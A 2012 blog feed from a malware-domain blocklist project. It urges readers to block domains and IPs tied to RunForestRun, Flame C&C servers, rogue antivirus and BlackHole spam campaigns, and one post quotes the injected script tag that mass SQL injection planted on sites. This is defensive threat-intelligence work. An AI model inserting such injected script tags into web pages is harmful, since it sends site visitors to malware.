Feed

Runforestrun update

Posted on June 26th, 2012 in 0day,exploit by dglosser

Old versions of Plesk store passwords in clear text
->   http://blog.unmaskparasites.com/2012/06/26/millions-of-website-passwords-stored-in-plain-text-in-plesk-panel/

There is  a remote  SQL vulnerability that has been found in old versions of Plesk allowing attackers to exploit those
passwords.
-> http://kb.parallels.com/en/113321

 

Combine these two together and what do you get, malware of course.

Plesk Vulnerability Leading to Malware
http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

Runforestrun and Pseudo Random Domains
http://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/

Run, Forest! (Update) – block 95.211.27.206

https://isc.sans.edu/diary/Run+Forest+Update+/13561

 

We’ve added a bunch of these domains but you should check the resources above, as well as new IP addresses to block.

 

(Thanks to Jack W. for keeping us up-to-date on these developments.)

 

 

Two updates: runforestrun, iceix, rogues, malvertising, malspam domains…

Posted on June 25th, 2012 in 0day,malvertising,New Domains,rogue antivirus,spam by dglosser

Two recent updates, adding over 230 domains associated with “RunForestRun, IceIX, Malicious Spam, Malicious Advertising, etc. Sources include www.malwaredomainlist.com, isc.sans.org, hosts-file.net and many more (all sources are listed in our domain.txt file.)
Compressed files are located at: http://www.malware-domains.com (full zone files, note the dash)  and http://dns-bh.sagadc.org/.  We also have a mirror dedicated to research and Open Source Projects – contact us for details.
NO ZONE FILES ARE LOCATED ON THIS SITE.
* Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.
* These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.
* Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned! Use wget -N”!
* Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.
* Domains.txt file is the complete list along with original reference. Justdomains contains list of only the domain names. BOOT file is in MS DNS format. Malwaredomains.zones file is in BIND format.  Also Available in AdBlock, ISA, and MaraDNS formats. A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

Vulnerabilityqueerprocessbrittleness

Posted on June 19th, 2012 in 0day,rogue antivirus by dglosser

The Internet Storm Center lists a bunch of fake antivirus domai Several are already part of our list; we’ll be adding the rest in tonight’s update.   Would appreciate it if someone points us to a publicly available full list….

Flame/Flamer/Skywipe Domains & IPs

Posted on May 31st, 2012 in 0day by dglosser

Several sources have published detailed information (1, 2, 3, 4 5) sabout the Flame (also known as Flamer or Skywipe) “attack toolkit”.

Some sites (1, 2) have also  published the Domains and IP addresses of Flame’s C&C servers…

IP: 91.203.214.72  91.135.66.118

Domains: traffic-spot .com  traffic-spot.biz  smart-access .net  quick-net .info

 

 

owlopadjet . info

Posted on May 19th, 2012 in 0day,iframes by dglosser

Probably should block this guy asap. We received an email stating that hxxp://owlopadjet . info/index.php?tp=e1909d7d62debace is infecting other websites.

See http://wepawet.iseclab.org/view.php?hash=c6f95bc490bb919ac9a9a16f8cfbcd2f&t=1337457427&type=js

 

sqli: Block Njukol -dot – com

Posted on April 29th, 2012 in 0day,iframes,New Domains,sql injection by dglosser

We received a report that there’s  a sqli injection going on with  njukol . com/ r.php.  Please check your web sites and add this to your block or shun list.      Original Source: http://ilion.blog47.fc2.com/

Urgent Block: nikjju.com and best-antiviruu.de.lv

Posted on April 17th, 2012 in 0day,iframes,rogue antivirus,sql injection by dglosser

Sucuri  is reporting a new Mass SQL Injection campaign.  Sites are infected with the following javascript:

<script src= http://nikjju . com/r.php ></script>

which redirects to Fake/Rogue AV sites such as best-antiviruu. de. lv

Please add these sites to your blocklists and sinkholes ASAP.

Urgent Block: ionis90landsi -dot- rr -dot- nu — Mass Injection of WordPress Websites

Posted on March 6th, 2012 in 0day,sql injection by dglosser

Websense has posted an article relating to mass SQL  injection into wordpress sites.  The domain is  ionis90landsi.  rr.   nu     (spaces added)

This link seems to have a larger list  of domains to block…

Urgent Block: BlackHole Exploit Kit redret Spam Domains

Posted on December 6th, 2011 in 0day,Domain News,malspam by dglosser

From the Internet Storm Center, please block the following domains:

  • czredret . ru
  • curedret . ru
  • ctredret . ru
  • crredret . ru
  • bzredret . ru
  • byredret . ru
  • bxredret . ru
  • bwredret . ru
  • bvredret . ru
  • bsredret . ru
  • bpredret . ru
  • boredret . ru
  • blredret . ru
  • bkredret . ru
  • biredret . ru
  • bhredret . ru
  • bgredret . ru
  • bfredret . ru,
  • beredret . ru
  • bdredret . ru
  • bcredret . ru
  • bbredret . ru
  • aredret . ru
  • apredret . ru
  • amredret . ru
  • alredret . ru
  • akredret . ru
  • ajredret . ru
  • airedret . ru
  • ahredret . ru
  • agredret . ru
  • afredret . ru
  • aeredret . ru
  • adredret . ru
  • acredret . ru
  • abredret . ru
  • aaredret . ru

and be on the lookout for more domains containing the string “redret” (hmmm I wonder if adbblock or mywot can handle regex..).

IP addresses to block are also in the article.  Also see this article.  Will be added here but you shouldn’t wait.

iframe,sqli,cybercriminal domains

Posted on December 3rd, 2011 in 0day,iframes,New Domains,Spyeye,Trojans,zeus by dglosser

A small but important update containing domains associated with iframes, cybercriminals, zeus, and our friend lilupophilupop . com.   Sources include malc0de.com, safebrowsing.google.com, www.spamhaus.org (Every source is  listed in the domains.txt file)…

Reminder: the mirror for compressed zip files is up and running – please contact us for details – right now it has very little usage.

Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.

These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.

Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned!

Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.

Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.

A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…